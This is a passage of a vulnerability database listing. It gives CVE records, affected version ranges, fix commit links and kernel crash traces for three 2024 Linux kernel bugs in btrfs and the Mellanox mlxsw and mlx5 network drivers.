"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "87299cdaae757f3f41212146cfb5b3af416b8385",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d1ffa4ae2d591fdd40471074e79954ec45f147f7",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "36c2a2863bc3896243eb724dc3fd4cf9aea633f2",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "0d23b34c68c46cd225b55868bc8a269e3134816d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "1f9212cdbd005bc55f2b7422e7b560d9c02bd1da",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7411055db5ce64f836aaffd422396af0075fdc99",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/btrfs/volumes.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.155",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.86",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.27",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.155",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.86",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: handle chunk tree lookup error in btrfs_relocate_sys_chunks()\n\nThe unhandled case in btrfs_relocate_sys_chunks() loop is a corruption,\nas it could be caused only by two impossible conditions:\n\n- at first the search key is set up to look for a chunk tree item, with\n offset -1, this is an inexact search and the key-\u003eoffset will contain\n the correct offset upon a successful search, a valid chunk tree item\n cannot have an offset -1\n\n- after first successful search, the found_key corresponds to a chunk\n item, the offset is decremented by 1 before the next loop, it\u0027s\n impossible to find a chunk item there due to alignment and size\n constraints"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:08:47.348Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/bebd9e0ff90034875c5dfe4bd514fd7055fc7a89"
},
{
"url": "https://git.kernel.org/stable/c/576164bd01bd795f8b09fb194b493103506b33c9"
},
{
"url": "https://git.kernel.org/stable/c/87299cdaae757f3f41212146cfb5b3af416b8385"
},
{
"url": "https://git.kernel.org/stable/c/d1ffa4ae2d591fdd40471074e79954ec45f147f7"
},
{
"url": "https://git.kernel.org/stable/c/36c2a2863bc3896243eb724dc3fd4cf9aea633f2"
},
{
"url": "https://git.kernel.org/stable/c/0d23b34c68c46cd225b55868bc8a269e3134816d"
},
{
"url": "https://git.kernel.org/stable/c/1f9212cdbd005bc55f2b7422e7b560d9c02bd1da"
},
{
"url": "https://git.kernel.org/stable/c/7411055db5ce64f836aaffd422396af0075fdc99"
}
],
"title": "btrfs: handle chunk tree lookup error in btrfs_relocate_sys_chunks()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35936",
"datePublished": "2024-05-19T10:10:42.967Z",
"dateReserved": "2024-05-17T13:50:33.130Z",
"dateUpdated": "2025-05-04T09:08:47.348Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35855 (GCVE-0-2024-35855)
Vulnerability from cvelistv5
Published
2024-05-17 14:47
Modified
2025-05-04 09:06
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
mlxsw: spectrum_acl_tcam: Fix possible use-after-free during activity update
The rule activity update delayed work periodically traverses the list of
configured rules and queries their activity from the device.
As part of this task it accesses the entry pointed by 'ventry->entry',
but this entry can be changed concurrently by the rehash delayed work,
leading to a use-after-free [1].
Fix by closing the race and perform the activity query under the
'vregion->lock' mutex.
[1]
BUG: KASAN: slab-use-after-free in mlxsw_sp_acl_tcam_flower_rule_activity_get+0x121/0x140
Read of size 8 at addr ffff8881054ed808 by task kworker/0:18/181
CPU: 0 PID: 181 Comm: kworker/0:18 Not tainted 6.9.0-rc2-custom-00781-gd5ab772d32f7 #2
Hardware name: Mellanox Technologies Ltd. MSN3700/VMOD0005, BIOS 5.11 01/06/2019
Workqueue: mlxsw_core mlxsw_sp_acl_rule_activity_update_work
Call Trace:
<TASK>
dump_stack_lvl+0xc6/0x120
print_report+0xce/0x670
kasan_report+0xd7/0x110
mlxsw_sp_acl_tcam_flower_rule_activity_get+0x121/0x140
mlxsw_sp_acl_rule_activity_update_work+0x219/0x400
process_one_work+0x8eb/0x19b0
worker_thread+0x6c9/0xf70
kthread+0x2c9/0x3b0
ret_from_fork+0x4d/0x80
ret_from_fork_asm+0x1a/0x30
</TASK>
Allocated by task 1039:
kasan_save_stack+0x33/0x60
kasan_save_track+0x14/0x30
__kasan_kmalloc+0x8f/0xa0
__kmalloc+0x19c/0x360
mlxsw_sp_acl_tcam_entry_create+0x7b/0x1f0
mlxsw_sp_acl_tcam_vchunk_migrate_all+0x30d/0xb50
mlxsw_sp_acl_tcam_vregion_rehash_work+0x157/0x1300
process_one_work+0x8eb/0x19b0
worker_thread+0x6c9/0xf70
kthread+0x2c9/0x3b0
ret_from_fork+0x4d/0x80
ret_from_fork_asm+0x1a/0x30
Freed by task 1039:
kasan_save_stack+0x33/0x60
kasan_save_track+0x14/0x30
kasan_save_free_info+0x3b/0x60
poison_slab_object+0x102/0x170
__kasan_slab_free+0x14/0x30
kfree+0xc1/0x290
mlxsw_sp_acl_tcam_vchunk_migrate_all+0x3d7/0xb50
mlxsw_sp_acl_tcam_vregion_rehash_work+0x157/0x1300
process_one_work+0x8eb/0x19b0
worker_thread+0x6c9/0xf70
kthread+0x2c9/0x3b0
ret_from_fork+0x4d/0x80
ret_from_fork_asm+0x1a/0x30
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 2bffc5322fd8679e879cd6370881ee50cf141ada Version: 2bffc5322fd8679e879cd6370881ee50cf141ada Version: 2bffc5322fd8679e879cd6370881ee50cf141ada Version: 2bffc5322fd8679e879cd6370881ee50cf141ada Version: 2bffc5322fd8679e879cd6370881ee50cf141ada Version: 2bffc5322fd8679e879cd6370881ee50cf141ada Version: 2bffc5322fd8679e879cd6370881ee50cf141ada |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35855",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-17T16:58:00.643012Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:33:37.309Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.376Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1b73f6e4ea770410a937a8db98f77e52594d23a0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e24d2487424779c02760ff50cd9021b8676e19ef"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c17976b42d546ee118ca300db559630ee96fb758"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b996e8699da810e4c915841d6aaef761007f933a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/feabdac2057e863d0e140a2adf3d232eb4882db4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b183b915beef818a25e3154d719ca015a1ae0770"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/79b5b4b18bc85b19d3a518483f9abbbe6d7b3ba4"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "1b73f6e4ea770410a937a8db98f77e52594d23a0",
"status": "affected",
"version": "2bffc5322fd8679e879cd6370881ee50cf141ada",
"versionType": "git"
},
{
"lessThan": "e24d2487424779c02760ff50cd9021b8676e19ef",
"status": "affected",
"version": "2bffc5322fd8679e879cd6370881ee50cf141ada",
"versionType": "git"
},
{
"lessThan": "c17976b42d546ee118ca300db559630ee96fb758",
"status": "affected",
"version": "2bffc5322fd8679e879cd6370881ee50cf141ada",
"versionType": "git"
},
{
"lessThan": "b996e8699da810e4c915841d6aaef761007f933a",
"status": "affected",
"version": "2bffc5322fd8679e879cd6370881ee50cf141ada",
"versionType": "git"
},
{
"lessThan": "feabdac2057e863d0e140a2adf3d232eb4882db4",
"status": "affected",
"version": "2bffc5322fd8679e879cd6370881ee50cf141ada",
"versionType": "git"
},
{
"lessThan": "b183b915beef818a25e3154d719ca015a1ae0770",
"status": "affected",
"version": "2bffc5322fd8679e879cd6370881ee50cf141ada",
"versionType": "git"
},
{
"lessThan": "79b5b4b18bc85b19d3a518483f9abbbe6d7b3ba4",
"status": "affected",
"version": "2bffc5322fd8679e879cd6370881ee50cf141ada",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.1"
},
{
"lessThan": "5.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.158",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.30",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.158",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.90",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.30",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.9",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_acl_tcam: Fix possible use-after-free during activity update\n\nThe rule activity update delayed work periodically traverses the list of\nconfigured rules and queries their activity from the device.\n\nAs part of this task it accesses the entry pointed by \u0027ventry-\u003eentry\u0027,\nbut this entry can be changed concurrently by the rehash delayed work,\nleading to a use-after-free [1].\n\nFix by closing the race and perform the activity query under the\n\u0027vregion-\u003elock\u0027 mutex.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_acl_tcam_flower_rule_activity_get+0x121/0x140\nRead of size 8 at addr ffff8881054ed808 by task kworker/0:18/181\n\nCPU: 0 PID: 181 Comm: kworker/0:18 Not tainted 6.9.0-rc2-custom-00781-gd5ab772d32f7 #2\nHardware name: Mellanox Technologies Ltd. MSN3700/VMOD0005, BIOS 5.11 01/06/2019\nWorkqueue: mlxsw_core mlxsw_sp_acl_rule_activity_update_work\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0xc6/0x120\n print_report+0xce/0x670\n kasan_report+0xd7/0x110\n mlxsw_sp_acl_tcam_flower_rule_activity_get+0x121/0x140\n mlxsw_sp_acl_rule_activity_update_work+0x219/0x400\n process_one_work+0x8eb/0x19b0\n worker_thread+0x6c9/0xf70\n kthread+0x2c9/0x3b0\n ret_from_fork+0x4d/0x80\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\nAllocated by task 1039:\n kasan_save_stack+0x33/0x60\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x8f/0xa0\n __kmalloc+0x19c/0x360\n mlxsw_sp_acl_tcam_entry_create+0x7b/0x1f0\n mlxsw_sp_acl_tcam_vchunk_migrate_all+0x30d/0xb50\n mlxsw_sp_acl_tcam_vregion_rehash_work+0x157/0x1300\n process_one_work+0x8eb/0x19b0\n worker_thread+0x6c9/0xf70\n kthread+0x2c9/0x3b0\n ret_from_fork+0x4d/0x80\n ret_from_fork_asm+0x1a/0x30\n\nFreed by task 1039:\n kasan_save_stack+0x33/0x60\n kasan_save_track+0x14/0x30\n kasan_save_free_info+0x3b/0x60\n poison_slab_object+0x102/0x170\n __kasan_slab_free+0x14/0x30\n kfree+0xc1/0x290\n mlxsw_sp_acl_tcam_vchunk_migrate_all+0x3d7/0xb50\n mlxsw_sp_acl_tcam_vregion_rehash_work+0x157/0x1300\n process_one_work+0x8eb/0x19b0\n worker_thread+0x6c9/0xf70\n kthread+0x2c9/0x3b0\n ret_from_fork+0x4d/0x80\n ret_from_fork_asm+0x1a/0x30"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:06:55.614Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/1b73f6e4ea770410a937a8db98f77e52594d23a0"
},
{
"url": "https://git.kernel.org/stable/c/e24d2487424779c02760ff50cd9021b8676e19ef"
},
{
"url": "https://git.kernel.org/stable/c/c17976b42d546ee118ca300db559630ee96fb758"
},
{
"url": "https://git.kernel.org/stable/c/b996e8699da810e4c915841d6aaef761007f933a"
},
{
"url": "https://git.kernel.org/stable/c/feabdac2057e863d0e140a2adf3d232eb4882db4"
},
{
"url": "https://git.kernel.org/stable/c/b183b915beef818a25e3154d719ca015a1ae0770"
},
{
"url": "https://git.kernel.org/stable/c/79b5b4b18bc85b19d3a518483f9abbbe6d7b3ba4"
}
],
"title": "mlxsw: spectrum_acl_tcam: Fix possible use-after-free during activity update",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35855",
"datePublished": "2024-05-17T14:47:31.436Z",
"dateReserved": "2024-05-17T13:50:33.106Z",
"dateUpdated": "2025-05-04T09:06:55.614Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35960 (GCVE-0-2024-35960)
Vulnerability from cvelistv5
Published
2024-05-20 09:41
Modified
2025-05-04 09:09
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/mlx5: Properly link new fs rules into the tree
Previously, add_rule_fg would only add newly created rules from the
handle into the tree when they had a refcount of 1. On the other hand,
create_flow_handle tries hard to find and reference already existing
identical rules instead of creating new ones.
These two behaviors can result in a situation where create_flow_handle
1) creates a new rule and references it, then
2) in a subsequent step during the same handle creation references it
again,
resulting in a rule with a refcount of 2 that is not linked into the
tree, will have a NULL parent and root and will result in a crash when
the flow group is deleted because del_sw_hw_rule, invoked on rule
deletion, assumes node->parent is != NULL.
This happened in the wild, due to another bug related to incorrect
handling of duplicate pkt_reformat ids, which lead to the code in
create_flow_handle incorrectly referencing a just-added rule in the same
flow handle, resulting in the problem described above. Full details are
at [1].
This patch changes add_rule_fg to add new rules without parents into
the tree, properly initializing them and avoiding the crash. This makes
it more consistent with how rules are added to an FTE in
create_flow_handle.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 74491de937125d0c98c9b9c9208b4105717a3caa Version: 74491de937125d0c98c9b9c9208b4105717a3caa Version: 74491de937125d0c98c9b9c9208b4105717a3caa Version: 74491de937125d0c98c9b9c9208b4105717a3caa Version: 74491de937125d0c98c9b9c9208b4105717a3caa Version: 74491de937125d0c98c9b9c9208b4105717a3caa Version: 74491de937125d0c98c9b9c9208b4105717a3caa Version: 74491de937125d0c98c9b9c9208b4105717a3caa |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "de0139719cdd",
"status": "affected",
"version": "74491de93712",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "3d90ca9145f6",
"status": "affected",
"version": "74491de93712",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "7aaee12b804c",
"status": "affected",
"version": "74491de93712",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "2e8dc5cffc84",
"status": "affected",
"version": "74491de93712",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5cf5337ef701",
"status": "affected",
"version": "74491de93712",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "adf67a03af39",
"status": "affected",
"version": "74491de93712",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "7c6782ad4911",
"status": "affected",
"version": "74491de93712",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "4.10"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "4.10",
"status": "unaffected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "4.20",
"status": "unaffected",
"version": "4.19.313",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "5.5",
"status": "unaffected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "5.11",
"status": "unaffected",
"version": "5.10.216",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "5.16",
"status": "unaffected",
"version": "5.15.156",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.2",
"status": "unaffected",
"version": "6.1.87",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.7",
"status": "unaffected",
"version": "6.6.28",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.9",
"status": "unaffected",
"version": "6.8.7",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.9"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-35960",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-01-16T21:09:41.022641Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476 NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-01-16T21:09:59.289Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:49.117Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/de0139719cdda82806a47580ca0df06fc85e0bd2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1263b0b26077b1183c3c45a0a2479573a351d423"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3d90ca9145f6b97b38d0c2b6b30f6ca6af9c1801"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7aaee12b804c5e0374e7b132b6ec2158ff33dd64"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2e8dc5cffc844dacfa79f056dea88002312f253f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5cf5337ef701830f173b4eec00a4f984adeb57a0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/adf67a03af39095f05d82050f15813d6f700159d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7c6782ad4911cbee874e85630226ed389ff2e453"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/fs_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "de0139719cdda82806a47580ca0df06fc85e0bd2",
"status": "affected",
"version": "74491de937125d0c98c9b9c9208b4105717a3caa",
"versionType": "git"
},
{
"lessThan": "1263b0b26077b1183c3c45a0a2479573a351d423",
"status": "affected",
"version": "74491de937125d0c98c9b9c9208b4105717a3caa",
"versionType": "git"
},
{
"lessThan": "3d90ca9145f6b97b38d0c2b6b30f6ca6af9c1801",
"status": "affected",
"version": "74491de937125d0c98c9b9c9208b4105717a3caa",
"versionType": "git"
},
{
"lessThan": "7aaee12b804c5e0374e7b132b6ec2158ff33dd64",
"status": "affected",
"version": "74491de937125d0c98c9b9c9208b4105717a3caa",
"versionType": "git"
},
{
"lessThan": "2e8dc5cffc844dacfa79f056dea88002312f253f",
"status": "affected",
"version": "74491de937125d0c98c9b9c9208b4105717a3caa",
"versionType": "git"
},
{
"lessThan": "5cf5337ef701830f173b4eec00a4f984adeb57a0",
"status": "affected",
"version": "74491de937125d0c98c9b9c9208b4105717a3caa",
"versionType": "git"
},
{
"lessThan": "adf67a03af39095f05d82050f15813d6f700159d",
"status": "affected",
"version": "74491de937125d0c98c9b9c9208b4105717a3caa",
"versionType": "git"
},
{
"lessThan": "7c6782ad4911cbee874e85630226ed389ff2e453",
"status": "affected",
"version": "74491de937125d0c98c9b9c9208b4105717a3caa",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/fs_core.c"
],
